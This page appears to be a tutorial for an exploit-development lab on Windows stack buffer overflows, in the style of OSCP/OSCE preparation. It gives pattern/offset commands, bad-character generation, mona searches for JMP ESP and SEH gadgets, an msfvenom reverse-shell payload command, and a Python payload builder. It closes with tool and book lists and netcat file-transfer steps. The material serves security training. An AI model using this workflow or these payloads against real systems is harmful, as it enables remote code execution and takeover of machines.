Tutorials / Methodologies

# generate a unique cyclic pattern of $length bytes and send it instead of the "A"s
msf-pattern_create -l $length
# look up where the 4 bytes that landed in EIP sit in that pattern (offset to the return address)
msf-pattern_offset -l $length -q $EIP

import sys

# Build the escaped "\x01\x02...\xff" string to paste into the exploit.
# 0x00 is left out on purpose: a null byte terminates C strings and is almost always bad.
badchars = ""
for x in range(1, 256):
    badchars += "\\x" + '{:02x}'.format(x)
sys.stdout.write(badchars + "\n")

badchars = ( "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"

# get the opcode bytes for JMP ESP (from msf-nasm_shell); this is what you search the modules for
   nasm > jmp esp
   00000000  FFE4              jmp esp

# list loaded modules; pick one without ASLR/Rebase/SafeSEH and with no bad chars in its address range
!mona modules
# find the address of "jmp esp" (\xff\xe4) in the chosen module
!mona find -s "\xff\xe4" -m "libspp.dll"
# find a "pop, pop, ret" gadget for an SEH overwrite
!mona seh -m "$module"

# generate a Windows reverse shell, encoded so that it contains none of the bad characters found above
msfvenom -p windows/shell_reverse_tcp LHOST=$IP LPORT=$PORT -f c -e x86/shikata_ga_nai -b "\x00"
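The steps above (cyclic pattern, offset lookup, bad-character array, then stacking junk + JMP ESP + NOP sled + shellcode) can be reproduced without the Metasploit tools. The Python below is an added example, not code from the original page: it reimplements the msf-pattern_create/msf-pattern_offset algorithm, mirrors what mona's bytearray/compare steps check, and assembles both the classic EIP payload and an SEH payload. The EIP value, gadget addresses and memory dump in the demo are constructed placeholders, not real ones.

```python
"""Reimplementation of the pattern / bad-char / payload steps (added example)."""
import string
import struct

# msf-pattern_create cycles through every Upper/lower/digit triple
# ("Aa0Aa1...Aa9Ab0..."), so any 4-byte window is unique for 20280 chars.
_SETS = (string.ascii_uppercase, string.ascii_lowercase, string.digits)


def pattern_create(length):
    """Same pattern as `msf-pattern_create -l length`."""
    chunks, n = [], 0
    while n < length:
        for a in _SETS[0]:
            for b in _SETS[1]:
                for c in _SETS[2]:
                    chunks.append(a + b + c)
                    n += 3
                    if n >= length:
                        return "".join(chunks)[:length]
    return "".join(chunks)[:length]


def pattern_offset(length, query):
    """Offset of query in the pattern, like `msf-pattern_offset -l length -q EIP`.

    query is either the 4 ASCII bytes seen in the debugger ("Ba0B") or the
    8-hex-digit EIP value (42306142); x86 is little-endian, so the hex form is
    byte-reversed before searching.  Returns -1 if EIP was not overwritten.
    """
    if len(query) == 8 and all(ch in string.hexdigits for ch in query):
        query = bytes.fromhex(query)[::-1].decode("ascii")
    return pattern_create(length).find(query)


def badchar_array(bad=b"\x00"):
    """Every byte value except the ones already known to be bad (mona bytearray -cpb)."""
    return bytes(b for b in range(256) if b not in bad)


def first_mismatch(sent, dumped):
    """First byte that was mangled in memory, or None if all arrived intact.

    `dumped` is the memory read back at the array's address (what mona compare
    looks at); the first differing byte is the next bad char to exclude.
    """
    for s, d in zip(sent, dumped):
        if s != d:
            return s
    return None


def build_payload(offset, jmp_esp, shellcode, total=None, nops=16):
    """Classic layout: junk up to EIP, JMP ESP address, NOP sled, shellcode."""
    buf = b"A" * offset + struct.pack("<I", jmp_esp) + b"\x90" * nops + shellcode
    if total is not None:                      # keep the crash length constant
        buf += b"C" * (total - len(buf))
    return buf


def build_seh_payload(nseh_offset, pop_pop_ret, shellcode, nops=16):
    """SEH layout: junk, nSEH = short jmp over the SEH record, SEH = pop/pop/ret, sled, shellcode."""
    nseh = b"\xeb\x06\x90\x90"                 # jmp short +6 (skips the 4-byte SEH slot), padded
    return (b"A" * nseh_offset + nseh + struct.pack("<I", pop_pop_ret)
            + b"\x90" * nops + shellcode)


if __name__ == "__main__":
    # Constructed scenario: EIP read 42306142 after sending a 1000-byte pattern.
    off = pattern_offset(1000, "42306142")
    print("EIP offset:", off)
    # Constructed dump in which the target mangled 0x0a (e.g. a line-based parser).
    sent = badchar_array(b"\x00")
    dumped = sent.replace(b"\x0a", b"\x00", 1)
    print("next bad char:", hex(first_mismatch(sent, dumped)))
    # 0x625011af is a made-up JMP ESP address, \xcc a stand-in for real shellcode.
    print("payload length:", len(build_payload(off, 0x625011af, b"\xcc", total=1000)))
```

Rerun `badchar_array` with each newly found byte added to `bad` until `first_mismatch` returns None; only then generate the shellcode with `-b` covering that full set.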


  • Immunity Debugger: A powerful new way to write exploits, analyze malware, and reverse engineer binary files (whitepaper, course)

  • OllyDbg: A 32-bit assembler level analysing debugger for Microsoft Windows (tut)

  • Windbg: A kernel-mode and user-mode debugger that is included in Debugging Tools for Windows (tut)

  • edb: A Linux equivalent of the famous Olly debugger on the Windows platform.

  • Boofuzz: Network Protocol Fuzzing for Humans

  • mona: A Python script that can be used to automate and speed up specific searches while developing exploits (typically for the Windows platform) (tut, cheatsheet)

    !mona findmsp                       # locate the cyclic pattern in registers/stack (EIP offset, where ESP points)
    !mona modules [ -o ]                # list modules; -o hides OS modules, the application's own DLLs are more reliable (same address across Windows versions)
    !mona jmp -r esp [ -o ]             # search for jmp esp / call esp / push esp;ret
    !mona seh                           # pop,pop,ret gadgets for SEH overwrites
    !mona seh -m "$module" -o           # same, restricted to one module
    !mona bytearray -cpb "\x00"         # write bytearray.bin / .txt, excluding known bad chars
    !mona compare -f c:\mona\pcmanftpd2\bytearray.bin -a 0012ED6C   # diff it against memory at the address where it landed
    !mona find -s "\xff\xe4" -m "libspp.dll"   # raw opcode search in a module

Exploitation for Practice

Structured Exception Handler (SEH)

More Targets

Advanced Topics for OSCE


  • Hacking - The Art of Exploitation
  • The Shellcoder’s Handbook: Discovering and Exploiting Security Holes
  • Buffer Overflow Attacks: Detect, Exploit, Prevent
  • Writing Security Tools and Exploits
  • Penetration Testing with Shellcode: Detect, exploit, and secure network-level and operating system vulnerabilities
# On Kali, start the listener first (receives the binary)
~/OSCP/windows_buffer_overflows$ nc -l -p 1234 > VulnApp1.exe
# On Windows, push the binary to Kali ($IP = Kali's address; the host argument is required)
C:\Tools\windows_buffer_overflows> nc -w 3 $IP 1234 < VulnApp1.exe

# Windows 10: Bridged Adapter network
# Kali: NAT network
  • Download windows 10 x86 ISO: https://www.microsoft.com/en-gb/software-download/windows10ISO